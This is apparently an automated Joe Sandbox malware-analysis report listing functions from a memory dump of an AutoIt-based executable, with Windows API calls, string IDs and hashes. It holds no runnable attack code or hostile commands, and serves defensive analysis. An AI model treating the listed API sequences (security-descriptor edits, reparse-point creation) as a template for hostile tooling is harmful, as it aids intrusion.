                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                • API String ID: 618562835-2268648507
                                                                                • Opcode ID: 3d36352e0eab603538aea08480bdc0aacff50739510de54002aaefa6a7e73ae4
                                                                                • Instruction ID: 6d38dd4332d79ad3a138b268cf707278b43ce46bbafd47cfbd55252529891934
                                                                                • Opcode Fuzzy Hash: 3d36352e0eab603538aea08480bdc0aacff50739510de54002aaefa6a7e73ae4
                                                                                • Instruction Fuzzy Hash: 4B412F7280022DFACB15FBD0ED8ADEEB778AF19340F500065B50277092EA796F59CB61
                                                                                APIs
                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0076D0D8
                                                                                • __swprintf.LIBCMT ref: 0076D0FA
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0076D137
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0076D15C
                                                                                • _memset.LIBCMT ref: 0076D17B
                                                                                • _wcsncpy.LIBCMT ref: 0076D1B7
                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0076D1EC
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0076D1F7
                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0076D200
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0076D20A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                • String ID: :$\$\??\%s
                                                                                • API String ID: 2733774712-3457252023
                                                                                • Opcode ID: f461d0a22cbd4dff68d02939f2022771ec8fa4b3ff7e36c409a85fab4aed136c
                                                                                • Instruction ID: dfcc177f9890a7df2a6d10dff1d0310821492e6d05e401eec269fa34de69f6dc
                                                                                • Opcode Fuzzy Hash: f461d0a22cbd4dff68d02939f2022771ec8fa4b3ff7e36c409a85fab4aed136c
                                                                                • Instruction Fuzzy Hash: DB317671A10109ABDB31DFA4DC49FEB77BDEF89740F1040B5F90AD21A1E7789A458B24
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0078BEF4,?,?), ref: 0078E754
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0078BEF4,?,?,00000000,?), ref: 0078E76B
                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0078BEF4,?,?,00000000,?), ref: 0078E776
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0078BEF4,?,?,00000000,?), ref: 0078E783
                                                                                • GlobalLock.KERNEL32(00000000), ref: 0078E78C
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0078BEF4,?,?,00000000,?), ref: 0078E79B
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0078E7A4
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0078BEF4,?,?,00000000,?), ref: 0078E7AB
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0078BEF4,?,?,00000000,?), ref: 0078E7BC
                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,007AD9BC,?), ref: 0078E7D5
                                                                                • GlobalFree.KERNEL32(00000000), ref: 0078E7E5
                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 0078E809
                                                                                • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0078E834
                                                                                • DeleteObject.GDI32(00000000), ref: 0078E85C
                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0078E872
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                • String ID:
                                                                                • API String ID: 3840717409-0
                                                                                • Opcode ID: 7057f48d74fcd55b8339a8531f1a3387f09c72968285100d5d90915f234aa9ce
                                                                                • Instruction ID: cd710b587b4bd93abc8aaf54da96a93ca89420c20d99a6b5be650386e6c6590b
                                                                                • Opcode Fuzzy Hash: 7057f48d74fcd55b8339a8531f1a3387f09c72968285100d5d90915f234aa9ce
                                                                                • Instruction Fuzzy Hash: 85413975600208EFDB219F65DC88EAE7BB9FF8A715F108058F906D72A0D738AD41DB20
                                                                                APIs
                                                                                • __wsplitpath.LIBCMT ref: 0077076F
                                                                                • _wcscat.LIBCMT ref: 00770787
                                                                                • _wcscat.LIBCMT ref: 00770799
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007707AE
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007707C2
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 007707DA
                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 007707F4
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00770806
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                • String ID: *.*
                                                                                • API String ID: 34673085-438819550
                                                                                • Opcode ID: 39295e7bf32d6d7d72da7c30663885c6d8cc383178fed4fb79521d310ea06227
                                                                                • Instruction ID: 01c8644cb9b4c7ff22270e06afb1babf55f741688a7fa255616b7c82a513a84f
                                                                                • Opcode Fuzzy Hash: 39295e7bf32d6d7d72da7c30663885c6d8cc383178fed4fb79521d310ea06227
                                                                                • Instruction Fuzzy Hash: D5816E71604345DFCF24EF24C85596AB7E8BBC8384F18882EF889D7251E738E9558BD2
                                                                                APIs
                                                                                  • Part of subcall function 0073B34E: GetWindowLongW.USER32(?,000000EB), ref: 0073B35F
                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0078EF3B
                                                                                • GetFocus.USER32 ref: 0078EF4B
                                                                                • GetDlgCtrlID.USER32(00000000), ref: 0078EF56
                                                                                • _memset.LIBCMT ref: 0078F081
                                                                                • GetMenuItemInfoW.USER32 ref: 0078F0AC
                                                                                • GetMenuItemCount.USER32(00000000), ref: 0078F0CC
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 0078F0DF
                                                                                • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0078F113
                                                                                • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0078F15B
                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0078F193
                                                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0078F1C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                • String ID: 0
                                                                                • API String ID: 1296962147-4108050209
                                                                                • Opcode ID: 7d33f23b802940bf539cfe85bef58e932de0e01c70129024a7b9e164b6d17c5d
                                                                                • Instruction ID: 6fa3aa4f87f1ac8937c9334c0c41e5b844d13a3711f2d043795fbb475c17f8fe
                                                                                • Opcode Fuzzy Hash: 7d33f23b802940bf539cfe85bef58e932de0e01c70129024a7b9e164b6d17c5d
                                                                                • Instruction Fuzzy Hash: FD81AF70A49305EFD720EF14C888A6BBBE9FB88314F10452EF99597291D738DD01CBA2
                                                                                APIs
                                                                                  • Part of subcall function 0075ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0075ABD7
                                                                                  • Part of subcall function 0075ABBB: GetLastError.KERNEL32(?,0075A69F,?,?,?), ref: 0075ABE1
                                                                                  • Part of subcall function 0075ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0075A69F,?,?,?), ref: 0075ABF0
                                                                                  • Part of subcall function 0075ABBB: HeapAlloc.KERNEL32(00000000,?,0075A69F,?,?,?), ref: 0075ABF7
                                                                                  • Part of subcall function 0075ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0075AC0E
                                                                                  • Part of subcall function 0075AC56: GetProcessHeap.KERNEL32(00000008,0075A6B5,00000000,00000000,?,0075A6B5,?), ref: 0075AC62
                                                                                  • Part of subcall function 0075AC56: HeapAlloc.KERNEL32(00000000,?,0075A6B5,?), ref: 0075AC69
                                                                                  • Part of subcall function 0075AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0075A6B5,?), ref: 0075AC7A
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0075A8CB
                                                                                • _memset.LIBCMT ref: 0075A8E0
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0075A8FF
                                                                                • GetLengthSid.ADVAPI32(?), ref: 0075A910
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0075A94D
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0075A969
                                                                                • GetLengthSid.ADVAPI32(?), ref: 0075A986
                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0075A995
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0075A99C
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0075A9BD
                                                                                • CopySid.ADVAPI32(00000000), ref: 0075A9C4
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0075A9F5
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0075AA1B
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0075AA2F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                • String ID:
                                                                                • API String ID: 3996160137-0
                                                                                • Opcode ID: 80336e15c5480920ef860225280f327fd081ed2ae439d31f595739b52f71258d
                                                                                • Instruction ID: f0f1b6cbf97dc82148d05e85b1136d1005e863e0ece4ca0baedbeddb880a7a7c
                                                                                • Opcode Fuzzy Hash: 80336e15c5480920ef860225280f327fd081ed2ae439d31f595739b52f71258d
                                                                                • Instruction Fuzzy Hash: 7B512BB1900209BFDF10DF94DD45AEEBB79FF45301F04C22AE916A6290DB799E09CB61
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 00779E36
                                                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00779E42
                                                                                • CreateCompatibleDC.GDI32(?), ref: 00779E4E
                                                                                • SelectObject.GDI32(00000000,?), ref: 00779E5B
                                                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00779EAF
                                                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00779EEB
                                                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00779F0F
                                                                                • SelectObject.GDI32(00000006,?), ref: 00779F17
                                                                                • DeleteObject.GDI32(?), ref: 00779F20
                                                                                • DeleteDC.GDI32(00000006), ref: 00779F27
                                                                                • ReleaseDC.USER32(00000000,?), ref: 00779F32
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                • String ID: (
                                                                                • API String ID: 2598888154-3887548279
                                                                                • Opcode ID: 08cf20f571ad3e3e85f7b05864d7cd15d6fe2915c1036dec0361c49ec987bd19
                                                                                • Instruction ID: eb069035f3db0561c972fcdb56d7291fe29055ba88843a289685735f846a4bd1
                                                                                • Opcode Fuzzy Hash: 08cf20f571ad3e3e85f7b05864d7cd15d6fe2915c1036dec0361c49ec987bd19
                                                                                • Instruction Fuzzy Hash: 80513876A00209EFCB24CFA8C885EAEBBB9EF49350F14C41DF95A97210D779AD418B54
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString__swprintf_wprintf
                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 2889450990-2391861430
                                                                                • Opcode ID: 486fb9617eb7ec09979aa1fdf286bdd91b391afe79467f35090cc74d56ae82c9
                                                                                • Instruction ID: 07f85ee69f8970b035710e0b8eae666ff2c7c513482da1123d93304780e4103f
                                                                                • Opcode Fuzzy Hash: 486fb9617eb7ec09979aa1fdf286bdd91b391afe79467f35090cc74d56ae82c9
                                                                                • Instruction Fuzzy Hash: 58519171900119FACB16EBA0DD4AEEEB778AF18300F104065F506721A2EB396F55DB61
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString__swprintf_wprintf
                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 2889450990-3420473620
                                                                                • Opcode ID: 4188a6def831edd663f6c3a54395273f37b72c37ecbd6a0b4df289bc438e957a
                                                                                • Instruction ID: b374649a6f5f7ed13612c6da689c287614ee608f7554d996deb8d166d6f970c0
                                                                                • Opcode Fuzzy Hash: 4188a6def831edd663f6c3a54395273f37b72c37ecbd6a0b4df289bc438e957a
                                                                                • Instruction Fuzzy Hash: 4051C071900119EACB16EBE0DD4AEEEB778AF18300F504065F50672052EB7D6F59CF61
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00782BB5,?,?), ref: 00783C1D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: $E}$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                • API String ID: 3964851224-184178903
                                                                                • Opcode ID: 18c78d1b9eaa1d06ec630ca613e81310c4592bee7f2e19d852612df3da00114b
                                                                                • Instruction ID: fba83c54c394b27c6e5185087a3382b41aaca33c2c1dd157cf0b5291a8f62f51
                                                                                • Opcode Fuzzy Hash: 18c78d1b9eaa1d06ec630ca613e81310c4592bee7f2e19d852612df3da00114b
                                                                                • Instruction Fuzzy Hash: 65414230240249CBDF04FF18E855AEE3365AF52740F105465EC566B292EB7CAE1ACB70
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 007655D7
                                                                                • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00765664
                                                                                • GetMenuItemCount.USER32(007E1708), ref: 007656ED
                                                                                • DeleteMenu.USER32(007E1708,00000005,00000000,000000F5,?,?), ref: 0076577D
                                                                                • DeleteMenu.USER32(007E1708,00000004,00000000), ref: 00765785
                                                                                • DeleteMenu.USER32(007E1708,00000006,00000000), ref: 0076578D
                                                                                • DeleteMenu.USER32(007E1708,00000003,00000000), ref: 00765795
                                                                                • GetMenuItemCount.USER32(007E1708), ref: 0076579D
                                                                                • SetMenuItemInfoW.USER32(007E1708,00000004,00000000,00000030), ref: 007657D3
                                                                                • GetCursorPos.USER32(?), ref: 007657DD
                                                                                • SetForegroundWindow.USER32(00000000), ref: 007657E6
                                                                                • TrackPopupMenuEx.USER32(007E1708,00000000,?,00000000,00000000,00000000), ref: 007657F9
                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00765805
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                • String ID:
                                                                                • API String ID: 3993528054-0
                                                                                • Opcode ID: 8401622c3bbb93d2d9207ffd51794ee854db713dff06f12eca31a08a58931833
                                                                                • Instruction ID: a7e5618cd8eaebfb81611fc579e46b87dcdeecb4adda9606322f9451a01975e2
                                                                                • Opcode Fuzzy Hash: 8401622c3bbb93d2d9207ffd51794ee854db713dff06f12eca31a08a58931833
                                                                                • Instruction Fuzzy Hash: DE710570640606BFEB319F54CC49FAABF65FF41764F244205F9166A1E0C7B96C20EBA4
                                                                                APIs
                                                                                • __swprintf.LIBCMT ref: 007667FD
                                                                                • __swprintf.LIBCMT ref: 0076680A
                                                                                  • Part of subcall function 0074172B: __woutput_l.LIBCMT ref: 00741784
                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 00766834
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00766840
                                                                                • LockResource.KERNEL32(00000000), ref: 0076684D
                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 0076686D
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0076687F
                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0076688E
                                                                                • LockResource.KERNEL32(?), ref: 0076689A
                                                                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007668F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                • String ID: 5}
                                                                                • API String ID: 1433390588-1756650411
                                                                                • Opcode ID: 455bed41a6b56320b4777681aa4a929c1aa1a42cba9b27d66f8f28c7b9fdf630
                                                                                • Instruction ID: 7c7c49ce7f17ba12a6be719d8077cca64c9c4e1557b6e2cccbe851170d730275
                                                                                • Opcode Fuzzy Hash: 455bed41a6b56320b4777681aa4a929c1aa1a42cba9b27d66f8f28c7b9fdf630
                                                                                • Instruction Fuzzy Hash: 8A318C7190125AABDB11AF70DD89ABA7BA8FF49340B408425FD03E7150E738DE61DBA4
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007936F4,00000010,?,Bad directive syntax error,007BDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 007625D6
                                                                                • LoadStringW.USER32(00000000,?,007936F4,00000010), ref: 007625DD
                                                                                • _wprintf.LIBCMT ref: 00762610
                                                                                • __swprintf.LIBCMT ref: 00762632
                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007626A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                • API String ID: 1080873982-4153970271
                                                                                • Opcode ID: 1818c353bf7488aa3cdfce08667910d7e4106fbc7120e9bcc18d69e8a3d61dcc
                                                                                • Instruction ID: ca1772f5e789bf72266c4c000d133fceed62379217048f76fc24aecc56b57b58
                                                                                • Opcode Fuzzy Hash: 1818c353bf7488aa3cdfce08667910d7e4106fbc7120e9bcc18d69e8a3d61dcc
                                                                                • Instruction Fuzzy Hash: 4A216D7180022EEFCF12AB90DC0EEEE7B38BF18304F004455F506660A2EB79AA25DB51
                                                                                APIs
                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00767B42
                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00767B58
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00767B69
                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00767B7B
                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00767B8C
                                                                                Strings
                                                                                Memory Dump Source
